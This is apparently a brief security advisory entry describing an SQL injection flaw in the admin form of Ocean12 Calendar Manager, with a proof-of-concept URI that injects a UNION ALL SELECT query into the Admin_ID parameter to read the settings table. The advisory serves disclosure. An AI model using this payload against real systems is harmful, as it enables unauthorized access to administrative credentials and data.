|
|
Ocean12 Calendar Manager Admin Form SQL Injection Vulnerability
No exploit is required. The following proof of concept URI is available: http://www.example.com/products/calendar/demo/admin/?Admin_ID=Admin' UNION ALL SELECT id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,i d,id FROM settings WHERE Admin_id='Admin&Password=1 |
|
Privacy Statement |